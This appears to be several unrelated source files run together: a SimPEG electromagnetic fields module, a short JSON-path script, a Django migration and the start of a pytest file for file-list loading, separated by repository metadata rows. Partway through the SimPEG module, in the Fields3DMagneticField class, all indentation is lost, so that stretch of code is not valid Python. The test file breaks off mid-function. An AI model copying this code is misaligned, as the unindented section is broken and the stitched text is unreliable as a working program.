        bSolution = mkvc(self[src, "bSolution"])
        s_e = src.s_e(self.simulation)
        # w is the edge vector that MeSigmaI acts on in _eSecondary:
        # w = C.T * (MfMui * b) - s_e
        w = -s_e + self._edgeCurl.T * (self._MfMui * bSolution)
        if adjoint:
            s_eDeriv = src.s_eDeriv(self.simulation, self._MeSigmaI.T * v, adjoint)
            return (
                self._MeSigmaIDeriv(w, v, adjoint)
                + self._MfMuiDeriv(
                    bSolution, self._edgeCurl * (self._MeSigmaI.T * v), adjoint
                )
                - s_eDeriv
                + src.ePrimaryDeriv(self.simulation, v, adjoint)
            )
        s_eDeriv = src.s_eDeriv(self.simulation, v, adjoint)
        return (
            self._MeSigmaIDeriv(w, v)
            + self._MeSigmaI * (self._edgeCurl.T * self._MfMuiDeriv(bSolution, v))
            - self._MeSigmaI * s_eDeriv
            + src.ePrimaryDeriv(self.simulation, v, adjoint)
        )
    def _j(self, bSolution, source_list):
        """
        Secondary current density from bSolution

        :param numpy.ndarray bSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: current density
        """
        # NOTE(review): n and VI below are computed but never used --
        # dead code candidate; left in place to preserve behavior.
        n = int(self._aveE2CCV.shape[0] / self._nC)  # number of components
        VI = sdiag(np.kron(np.ones(n), 1.0 / self.simulation.mesh.vol))
        j = self._edgeCurl.T * (self._MfMui * bSolution)
        for i, src in enumerate(source_list):
            s_e = src.s_e(self.simulation)
            j[:, i] = j[:, i] - s_e
        return self._MeI * j
    def _jDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Partial derivative of the current density with respect to the thing we
        solved for.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the current density with respect
            to the field we solved for with a vector
        """
        if adjoint:
            return self._MfMui.T * (self._edgeCurl * (self._MeI.T * du_dm_v))
        return self._MeI * (self._edgeCurl.T * (self._MfMui * du_dm_v))
        # forgetting the source term here
    def _jDeriv_mui(self, src, v, adjoint=False):
        # derivative of j with respect to the inverse permeability (mui)
        if adjoint:
            return self._MfMuiDeriv(
                self[src, "b"], (self._edgeCurl * (self._MeI.T * v)), adjoint
            )
        return self._MeI * (self._edgeCurl.T * self._MfMuiDeriv(self[src, "b"], v))
    def _jDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the current density with respect to the inversion model

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the current density with respect
            to the model with a vector
        """
        return self._jDeriv_mui(src, v, adjoint)
    def _h(self, bSolution, source_list):
        """
        Magnetic field from bSolution

        :param numpy.ndarray bSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: magnetic field
        """
        # constitutive relation on faces: h = MfI * (MfMui * b)
        return self._MfI * (self._MfMui * self._b(bSolution, source_list))
    def _hDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Partial derivative of the magnetic field with respect to the thing we
        solved for.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic field with respect
            to the field we solved for with a vector
        """
        if adjoint:
            return self._MfMui.T * (self._MfI.T * du_dm_v)
        return self._MfI * (self._MfMui * du_dm_v)
    def _hDeriv_mui(self, src, v, adjoint=False):
        # derivative of h with respect to the inverse permeability (mui)
        b = self[src, "b"]
        if adjoint:
            return self._MfMuiDeriv(b, self._MfI.T * v, adjoint)
        return self._MfI * self._MfMuiDeriv(b, v)
    def _hDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the magnetic field with respect to the inversion model

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic field with respect
            to the model with a vector
        """
        return src.hPrimaryDeriv(self.simulation, v, adjoint) + self._hDeriv_mui(
            src, v, adjoint
        )
class Fields3DCurrentDensity(FieldsFDEM):
    """
    Fields object for Simulation3DCurrentDensity.

    The current density is solved for on mesh faces; all other fields are
    derived from it through the ``aliasFields`` mechanism.

    :param discretize.base.BaseMesh mesh: mesh
    :param SimPEG.electromagnetics.frequency_domain.SurveyFDEM.Survey survey: survey
    """
    # solution field name -> grid location ("F" = faces)
    knownFields = {"jSolution": "F"}
    # alias name -> [solution name, grid location, method used to compute it]
    aliasFields = {
        "j": ["jSolution", "F", "_j"],
        "jPrimary": ["jSolution", "F", "_jPrimary"],
        "jSecondary": ["jSolution", "F", "_jSecondary"],
        "h": ["jSolution", "E", "_h"],
        "hPrimary": ["jSolution", "E", "_hPrimary"],
        "hSecondary": ["jSolution", "E", "_hSecondary"],
        "e": ["jSolution", "F", "_e"],
        "b": ["jSolution", "E", "_b"],
    }
    def startup(self):
        # Cache mesh operators and simulation mass matrices once so the
        # field/derivative methods below avoid repeated property lookups.
        self._edgeCurl = self.simulation.mesh.edgeCurl
        self._MeMu = self.simulation.MeMu
        self._MeMuI = self.simulation.MeMuI
        self._MeMuIDeriv = self.simulation.MeMuIDeriv
        self._MfRho = self.simulation.MfRho
        self._MfRhoDeriv = self.simulation.MfRhoDeriv
        self._rho = self.simulation.rho
        # NOTE(review): assigns the inverse permeability (mui) to an
        # attribute named _mu -- confirm this is intentional.
        self._mu = self.simulation.mui
        self._aveF2CCV = self.simulation.mesh.aveF2CCV
        self._aveE2CCV = self.simulation.mesh.aveE2CCV
        self._nC = self.simulation.mesh.nC
        self._MeI = self.simulation.MeI
        self._MfI = self.simulation.MfI
    def _GLoc(self, fieldType):
        # Grid location of each field type: edges for h/b, faces for j/e.
        if fieldType in ["h", "hSecondary", "hPrimary", "b"]:
            return "E"
        elif fieldType in ["j", "jSecondary", "jPrimary", "e"]:
            return "F"
        else:
            raise Exception("Field type must be e, b, h, j")
    def _jPrimary(self, jSolution, source_list):
        """
        Primary current density from source

        :param numpy.ndarray jSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: primary current density as defined by the sources
        """
        jPrimary = np.zeros_like(jSolution, dtype=complex)
        for i, src in enumerate(source_list):
            jp = src.jPrimary(self.simulation)
            jPrimary[:, i] = jPrimary[:, i] + jp
        return jPrimary
    def _jSecondary(self, jSolution, source_list):
        """
        Secondary current density is the thing we solved for

        :param numpy.ndarray jSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: secondary current density
        """
        return jSolution
    def _j(self, jSolution, source_list):
        """
        Total current density is sum of primary and secondary

        :param numpy.ndarray jSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: total current density
        """
        return self._jPrimary(jSolution, source_list) + self._jSecondary(
            jSolution, source_list
        )
    def _jDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Partial derivative of the total current density with respect to the
        thing we solved for.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the current density with respect
            to the field we solved for with a vector
        """
        # j is the solution itself, so the derivative is the identity
        return Identity() * du_dm_v
    def _jDeriv_m(self, src, v, adjoint=False):
        """
        Partial derivative of the total current density with respect to the
        inversion model. Here, we assume that the primary does not depend on
        the model. Note that this also includes derivative contributions from
        the sources.

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: SimPEG.utils.Zero
        :return: product of the current density derivative with respect to the
            inversion model with a vector
        """
        # assuming primary does not depend on the model
        return src.jPrimaryDeriv(self.simulation, v, adjoint)
    def _hPrimary(self, jSolution, source_list):
        """
        Primary magnetic field from source

        :param numpy.ndarray jSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: primary magnetic field as defined by the sources
        """
        hPrimary = np.zeros(
            [self._edgeCurl.shape[1], jSolution.shape[1]], dtype=complex
        )
        for i, src in enumerate(source_list):
            hp = src.hPrimary(self.simulation)
            hPrimary[:, i] = hPrimary[:, i] + hp
        return hPrimary
    def _hSecondary(self, jSolution, source_list):
        """
        Secondary magnetic field from jSolution

        :param numpy.ndarray jSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: secondary magnetic field
        """
        # h = MeMuI * (s_m - C.T * (MfRho * j)) / (i*omega)
        h = self._edgeCurl.T * (self._MfRho * jSolution)
        for i, src in enumerate(source_list):
            h[:, i] *= -1.0 / (1j * omega(src.frequency))
            s_m = src.s_m(self.simulation)
            h[:, i] = h[:, i] + 1.0 / (1j * omega(src.frequency)) * (s_m)
        return self._MeMuI * h
    def _hDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Derivative of the magnetic field with respect to the thing we solved
        for

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic field with respect
            to the field we solved for with a vector
        """
        if adjoint:
            # adjoint applies the transposed matrices in reverse order
            return (
                -1.0
                / (1j * omega(src.frequency))
                * self._MfRho.T
                * (self._edgeCurl * (self._MeMuI.T * du_dm_v))
            )
        return (
            -1.0
            / (1j * omega(src.frequency))
            * self._MeMuI
            * (self._edgeCurl.T * (self._MfRho * du_dm_v))
        )
    def _hDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the magnetic field with respect to the inversion model

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic field with respect
            to the model with a vector
        """
        # NOTE(review): indexing with [src] (a list) here while sibling
        # methods use self[src, ...] -- confirm both forms are equivalent.
        jSolution = mkvc(self[[src], "jSolution"])
        MeMuI = self._MeMuI
        MeMuIDeriv = self._MeMuIDeriv
        C = self._edgeCurl
        MfRho = self._MfRho
        MfRhoDeriv = self._MfRhoDeriv
        s_m = src.s_m(self.simulation)
        def s_mDeriv(v):
            # derivative of the magnetic source term times a vector
            return src.s_mDeriv(self.simulation, v, adjoint=adjoint)
        if not adjoint:
            # product rule applied to MeMuI * (s_m - C.T*(MfRho*j)) / (i*omega)
            hDeriv_m = (
                1.0
                / (1j * omega(src.frequency))
                * (
                    -1.0
                    * (
                        MeMuI * (C.T * (MfRhoDeriv(jSolution, v, adjoint)))
                        + MeMuIDeriv(C.T * (MfRho * jSolution)) * v
                    )
                    + MeMuI * s_mDeriv(v)
                    + MeMuIDeriv(s_m) * v
                )
            )
        elif adjoint:
            hDeriv_m = (
                1.0
                / (1j * omega(src.frequency))
                * (
                    (
                        -1.0
                        * (
                            MfRhoDeriv(jSolution).T * (C * (MeMuI.T * v))
                            + MeMuIDeriv(C.T * (MfRho * jSolution)).T * v
                        )
                    )
                    + s_mDeriv(MeMuI.T * v)
                    + MeMuIDeriv(s_m).T * v
                )
            )
        return hDeriv_m + src.hPrimaryDeriv(self.simulation, v, adjoint)
    def _e(self, jSolution, source_list):
        """
        Electric field from jSolution

        :param numpy.ndarray jSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: electric field
        """
        # Ohm's law on faces: e = MfI * (MfRho * j)
        return self._MfI * (self._MfRho * self._j(jSolution, source_list))
    def _eDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Derivative of the electric field with respect to the thing we solved
        for

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the electric field with respect
            to the field we solved for with a vector
        """
        if adjoint:
            return self._MfRho.T * (self._MfI.T * du_dm_v)
        return self._MfI * (self._MfRho * du_dm_v)
    def _eDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the electric field with respect to the inversion model

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the electric field with respect
            to the model with a vector
        """
        jSolution = mkvc(self[src, "jSolution"])
        if adjoint:
            return self._MfRhoDeriv(jSolution).T * (
                self._MfI.T * v
            ) + src.ePrimaryDeriv(self.simulation, v, adjoint)
        return self._MfI * (self._MfRhoDeriv(jSolution) * v) + src.ePrimaryDeriv(
            self.simulation, v, adjoint
        )
    def _b(self, jSolution, source_list):
        """
        Secondary magnetic flux density from jSolution

        :param numpy.ndarray jSolution: field we solved for
        :param list source_list: list of sources
        :rtype: numpy.ndarray
        :return: secondary magnetic flux density
        """
        # constitutive relation on edges: b = MeI * (MeMu * h)
        return self._MeI * (self._MeMu * self._h(jSolution, source_list))
    def _bDeriv_u(self, src, du_dm_v, adjoint=False):
        """
        Derivative of the magnetic flux density with respect to the thing we
        solved for

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray du_dm_v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic flux density with
            respect to the field we solved for with a vector
        """
        if adjoint:
            return (
                -1.0
                / (1j * omega(src.frequency))
                * self._MfRho.T
                * (self._edgeCurl * (self._MeI.T * du_dm_v))
            )
        return (
            -1.0
            / (1j * omega(src.frequency))
            * (self._MeI * (self._edgeCurl.T * (self._MfRho * du_dm_v)))
        )
    def _bDeriv_m(self, src, v, adjoint=False):
        """
        Derivative of the magnetic flux density with respect to the inversion
        model

        :param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
        :param numpy.ndarray v: vector to take product with
        :param bool adjoint: adjoint?
        :rtype: numpy.ndarray
        :return: product of the derivative of the magnetic flux density with
            respect to the model with a vector
        """
        jSolution = self[src, "jSolution"]
        def s_mDeriv(v):
            # derivative of the magnetic source term times a vector
            return src.s_mDeriv(self.simulation, v, adjoint=adjoint)
        if adjoint:
            v = self._MeI.T * v
            return 1.0 / (1j * omega(src.frequency)) * (
                s_mDeriv(v) - self._MfRhoDeriv(jSolution, self._edgeCurl * v, adjoint)
            ) + src.bPrimaryDeriv(self.simulation, v, adjoint)
        return 1.0 / (1j * omega(src.frequency)) * self._MeI * (
            s_mDeriv(v) - self._edgeCurl.T * self._MfRhoDeriv(jSolution, v, adjoint)
        ) + src.bPrimaryDeriv(self.simulation, v, adjoint)
class Fields3DMagneticField(FieldsFDEM):
    """
    Fields object for Simulation3DMagneticField.

    The magnetic field is solved for on mesh edges.

    :param discretize.base.BaseMesh mesh: mesh
    :param SimPEG.electromagnetics.frequency_domain.SurveyFDEM.Survey survey: survey
    """
    # solution field name -> grid location ("E" = edges)
    knownFields = {"hSolution": "E"}
    # alias name -> [solution name, grid location, method used to compute it]
    # NOTE(review): e and b are aliased at cell centers ("CCV") here, while
    # _GLoc reports "F"/"E" for them -- confirm which location is intended.
    aliasFields = {
        "h": ["hSolution", "E", "_h"],
        "hPrimary": ["hSolution", "E", "_hPrimary"],
        "hSecondary": ["hSolution", "E", "_hSecondary"],
        "j": ["hSolution", "F", "_j"],
        "jPrimary": ["hSolution", "F", "_jPrimary"],
        "jSecondary": ["hSolution", "F", "_jSecondary"],
        "e": ["hSolution", "CCV", "_e"],
        "b": ["hSolution", "CCV", "_b"],
    }
def startup(self):
self._edgeCurl = self.simulation.mesh.edgeCurl
self._MeMu = self.simulation.MeMu
self._MeMuDeriv = self.simulation.MeMuDeriv
# self._MeMuI = self.simulation.MeMuI
self._MfRho = self.simulation.MfRho
self._MfRhoDeriv = self.simulation.MfRhoDeriv
self._rho = self.simulation.rho
self._mu = self.simulation.mui
self._aveF2CCV = self.simulation.mesh.aveF2CCV
self._aveE2CCV = self.simulation.mesh.aveE2CCV
self._nC = self.simulation.mesh.nC
self._MfI = self.simulation.MfI
self._MeI = self.simulation.MeI
def _GLoc(self, fieldType):
if fieldType in ["h", "hSecondary", "hPrimary", "b"]:
return "E"
elif fieldType in ["j", "jSecondary", "jPrimary", "e"]:
return "F"
else:
raise Exception("Field type must be e, b, h, j")
def _hPrimary(self, hSolution, source_list):
"""
Primary magnetic field from source
:param numpy.ndarray eSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary magnetic field as defined by the sources
"""
hPrimary = np.zeros_like(hSolution, dtype=complex)
for i, src in enumerate(source_list):
hp = src.hPrimary(self.simulation)
hPrimary[:, i] = hPrimary[:, i] + hp
return hPrimary
def _hSecondary(self, hSolution, source_list):
"""
Secondary magnetic field is the thing we solved for
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic field
"""
return hSolution
def _hDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Partial derivative of the total magnetic field with respect to the
thing we solved for.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect
to the field we solved for with a vector
"""
return Identity() * du_dm_v
def _hDeriv_m(self, src, v, adjoint=False):
"""
Partial derivative of the total magnetic field with respect to the
inversion model. Here, we assume that the primary does not depend
on the model. Note that this also includes derivative contributions
from the sources.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.utils.Zero
:return: product of the magnetic field derivative with respect to the
inversion model with a vector
"""
return src.hPrimaryDeriv(self.simulation, v, adjoint)
def _jPrimary(self, hSolution, source_list):
"""
Primary current density from source
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary current density as defined by the sources
"""
jPrimary = np.zeros(
[self._edgeCurl.shape[0], hSolution.shape[1]], dtype=complex
)
for i, src in enumerate(source_list):
jp = src.jPrimary(self.simulation)
jPrimary[:, i] = jPrimary[:, i] + jp
return jPrimary
def _jSecondary(self, hSolution, source_list):
"""
Secondary current density from hSolution
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary current density
"""
j = self._edgeCurl * hSolution
for i, src in enumerate(source_list):
s_e = src.s_e(self.simulation)
j[:, i] = j[:, i] + -s_e
return j
def _jDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the current density with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect
to the field we solved for with a vector
"""
if not adjoint:
return self._edgeCurl * du_dm_v
elif adjoint:
return self._edgeCurl.T * du_dm_v
def _jDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the current density with respect to the inversion model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the current density derivative with respect to the
inversion model with a vector
"""
return -src.s_eDeriv(self.simulation, v, adjoint) + src.jPrimaryDeriv(
self.simulation, v, adjoint
)
def _e(self, hSolution, source_list):
"""
Electric field from hSolution
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: electric field
"""
return self._MfI * (self._MfRho * self._j(hSolution, source_list))
def _eDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the electric field with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect
to the field we solved for with a vector
"""
if adjoint:
return self._edgeCurl.T * (self._MfRho.T * (self._MfI * du_dm_v))
return self._MfI * (self._MfRho * self._edgeCurl * du_dm_v)
def _eDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the electric field with respect to the inversion model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the electric field derivative with respect to the
inversion model with a vector
"""
hSolution = mkvc(self[src, "hSolution"])
s_e = src.s_e(self.simulation)
if adjoint:
w = self._MfI.T * v
return (
self._MfRhoDeriv(self._edgeCurl * hSolution, w, adjoint)
- self._MfRhoDeriv(s_e, w, adjoint)
+ src.ePrimaryDeriv(self.simulation, v, adjoint)
)
return self._MfI * (
self._MfRhoDeriv(self._edgeCurl * hSolution, v) - self._MfRhoDeriv(s_e, v)
) + src.ePrimaryDeriv(self.simulation, v, adjoint)
def _b(self, hSolution, source_list):
"""
Magnetic flux density from hSolution
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: magnetic flux density
"""
h = self._h(hSolution, source_list)
return self._MeI * (self._MeMu * h)
def _bDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the magnetic flux density with respect to the thing we
solved for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with
respect to the field we solved for with a vector
"""
if adjoint:
return self._MeMu.T * (self._MeI.T * du_dm_v)
return self._MeI * (self._MeMu * du_dm_v)
def _bDeriv_mu(self, src, v, adjoint=False):
h = self[src, "h"]
if adjoint:
return self._MeMuDeriv(h, self._MeI.T * v, adjoint)
return self._MeI * self._MeMuDeriv(h, v)
def _bDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the magnetic flux density with respect to the inversion
model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the magnetic flux density derivative with respect
to the inversion model with a vector
"""
return src.bPrimaryDeriv(self.simulation, v, adjoint) + self._bDeriv_mu(
src, v, adjoint
)
############
# Deprecated
############
@deprecate_class(removal_version="0.16.0", error=True)
class Fields3D_e(Fields3DElectricField):
    # Deprecated legacy name; with error=True, use presumably raises -- see deprecate_class.
    pass
@deprecate_class(removal_version="0.16.0", error=True)
class Fields3D_b(Fields3DMagneticFluxDensity):
    # Deprecated legacy name; with error=True, use presumably raises -- see deprecate_class.
    pass
@deprecate_class(removal_version="0.16.0", error=True)
class Fields3D_j(Fields3DCurrentDensity):
    # Deprecated legacy name; with error=True, use presumably raises -- see deprecate_class.
    pass
@deprecate_class(removal_version="0.16.0", error=True)
class Fields3D_h(Fields3DMagneticField):
    # Deprecated legacy name; with error=True, use presumably raises -- see deprecate_class.
    pass
| 36.511688 | 88 | 0.603472 |
01c18461479785834fd44b4712cba45a68b60a96 | 246 | py | Python | end-to-end/jget.py | tesserai/ambassador | 70fadc62872be9b041b90cba54d3920a21777548 | [
"Apache-2.0"
] | 1 | 2019-01-22T05:36:23.000Z | 2019-01-22T05:36:23.000Z | end-to-end/jget.py | tesserai/ambassador | 70fadc62872be9b041b90cba54d3920a21777548 | [
"Apache-2.0"
] | null | null | null | end-to-end/jget.py | tesserai/ambassador | 70fadc62872be9b041b90cba54d3920a21777548 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import sys
import json
import dpath.util

# Read JSON from stdin, extract the value at the dpath expression given as
# argv[1], pretty-print it and exit 0; exit 1 if the path does not exist.
document = json.load(sys.stdin)
try:
    value = dpath.util.get(document, sys.argv[1])
    print(json.dumps(value, sort_keys=True, indent=4))
    sys.exit(0)
except KeyError:
    sys.exit(1)
| 13.666667 | 50 | 0.654472 |
e33e7eda3109201c4cff3e74f10db30874ebb3a6 | 1,202 | py | Python | migrations/0002_auto_20191118_0710.py | khaledboka/csv_manager | ed5659cacb68fa1f8a4fa474e4faf20703fbc76b | [
"BSD-2-Clause"
] | null | null | null | migrations/0002_auto_20191118_0710.py | khaledboka/csv_manager | ed5659cacb68fa1f8a4fa474e4faf20703fbc76b | [
"BSD-2-Clause"
] | 4 | 2020-12-15T11:48:29.000Z | 2020-12-15T11:56:45.000Z | migrations/0002_auto_20191118_0710.py | cartologic/csv_manager | ed5659cacb68fa1f8a4fa474e4faf20703fbc76b | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import csv_manager.models
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration for csv_manager: widens the
    # geometry_type choices to OGR-style geometry names and adjusts the
    # column-name fields on the CsvUpload model.
    dependencies = [
        ('csv_manager', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='csvupload',
            name='geometry_type',
            field=models.CharField(max_length=55, null=True, choices=[(b'POINTXY', b'AS_XY'), (b'POINTXYZ', b'AS_XYZ'), (b'POINTYX', b'AS_YX'), (b'LINESTARTEND', b'start_end'), (b'LINE', b'wkbLineString'), (b'MULTILINE', b'wkbMultiLineString'), (b'MULTIPOINT', b'wkbMultiPoint'), (b'MULTIPOLYGON', b'wkbMultiPolygon'), (b'POINT', b'wkbPoint'), (b'POLYGON', b'wkbPolygon'), (b'UNKNOWN', b'wkbUnknown')]),
        ),
        migrations.AlterField(
            model_name='csvupload',
            name='the_geom_field_name',
            field=models.CharField(max_length=55, null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='csvupload',
            name='wkt_field_name',
            field=models.CharField(max_length=55, null=True, validators=[csv_manager.models.valid_column_name]),
        ),
    ]
| 38.774194 | 403 | 0.630616 |
ff1605976c1595096c8665e4e3f2ab519ba6f059 | 8,566 | py | Python | tests/utils/file_list_test.py | elifesciences/sciencebeam-utils | 7d232885b52a80e0ffeb4ab25bdb3640bf009ba4 | [
"MIT"
] | 2 | 2019-07-17T14:53:07.000Z | 2021-09-15T04:47:47.000Z | tests/utils/file_list_test.py | elifesciences/sciencebeam-utils | 7d232885b52a80e0ffeb4ab25bdb3640bf009ba4 | [
"MIT"
] | 108 | 2018-07-24T15:20:54.000Z | 2022-03-28T16:57:39.000Z | tests/utils/file_list_test.py | elifesciences/sciencebeam-utils | 7d232885b52a80e0ffeb4ab25bdb3640bf009ba4 | [
"MIT"
] | 2 | 2020-02-07T10:58:48.000Z | 2021-09-01T10:15:32.000Z | import os
from tempfile import NamedTemporaryFile
from unittest.mock import patch
from backports.tempfile import TemporaryDirectory
import pytest
import sciencebeam_utils.utils.file_list as file_list_loader
from sciencebeam_utils.utils.file_list import (
is_csv_or_tsv_file_list,
load_plain_file_list,
load_csv_or_tsv_file_list,
to_absolute_file_list,
to_relative_file_list,
load_file_list,
save_plain_file_list,
save_csv_or_tsv_file_list,
save_file_list
)
# Shared fixtures for the file-list tests.
FILE_1 = 'file1.pdf'
FILE_2 = 'file2.pdf'
UNICODE_FILE_1 = 'file1\u1234.pdf'  # non-ASCII name to exercise utf-8 handling
FILE_LIST = [FILE_1, FILE_2]
@pytest.fixture(name='load_plain_file_list_mock')
def _load_plain_file_list():
    """Yield a mock replacing file_list_loader.load_plain_file_list."""
    with patch.object(file_list_loader, 'load_plain_file_list') as patched:
        yield patched
@pytest.fixture(name='load_csv_or_tsv_file_list_mock')
def _load_csv_or_tsv_file_list():
    """Yield a mock replacing file_list_loader.load_csv_or_tsv_file_list."""
    with patch.object(file_list_loader, 'load_csv_or_tsv_file_list') as patched:
        yield patched
@pytest.fixture(name='to_absolute_file_list_mock')
def _to_absolute_file_list():
    """Yield a mock replacing file_list_loader.to_absolute_file_list."""
    with patch.object(file_list_loader, 'to_absolute_file_list') as patched:
        yield patched
class TestIsCsvOrTsvFileList:
    """Extension detection for csv/tsv file lists, including .gz variants."""
    def test_should_return_true_if_file_ext_is_csv(self):
        assert is_csv_or_tsv_file_list('files.csv')
    def test_should_return_true_if_file_ext_is_csv_gz(self):
        assert is_csv_or_tsv_file_list('files.csv.gz')
    def test_should_return_true_if_file_ext_is_tsv(self):
        assert is_csv_or_tsv_file_list('files.tsv')
    def test_should_return_true_if_file_ext_is_tsv_gz(self):
        assert is_csv_or_tsv_file_list('files.tsv.gz')
    def test_should_return_false_if_file_ext_is_lst(self):
        assert not is_csv_or_tsv_file_list('files.lst')
    def test_should_return_false_if_file_ext_is_lst_gz(self):
        assert not is_csv_or_tsv_file_list('files.lst.gz')
class TestLoadPlainFileList:
    """Loading newline-separated plain file lists (one path per line)."""
    def test_should_read_multiple_file_paths_from_file(self):
        with NamedTemporaryFile('w') as f:
            f.write('\n'.join([FILE_1, FILE_2]))
            f.flush()
            assert load_plain_file_list(f.name) == [FILE_1, FILE_2]
    def test_should_read_unicode_file(self):
        # written as raw utf-8 bytes to verify decoding on read
        with NamedTemporaryFile('wb') as f:
            f.write('\n'.join([UNICODE_FILE_1]).encode('utf-8'))
            f.flush()
            assert load_plain_file_list(f.name) == [UNICODE_FILE_1]
    def test_should_apply_limit(self):
        with NamedTemporaryFile('w') as f:
            f.write('\n'.join([FILE_1, FILE_2]))
            f.flush()
            assert load_plain_file_list(f.name, limit=1) == [FILE_1]
class TestLoadCsvOrTsvFileList:
    """Loading csv/tsv file lists by column name or index, with/without header."""
    def test_should_read_multiple_file_paths_from_file_with_header_using_column_name(self):
        with NamedTemporaryFile('w') as f:
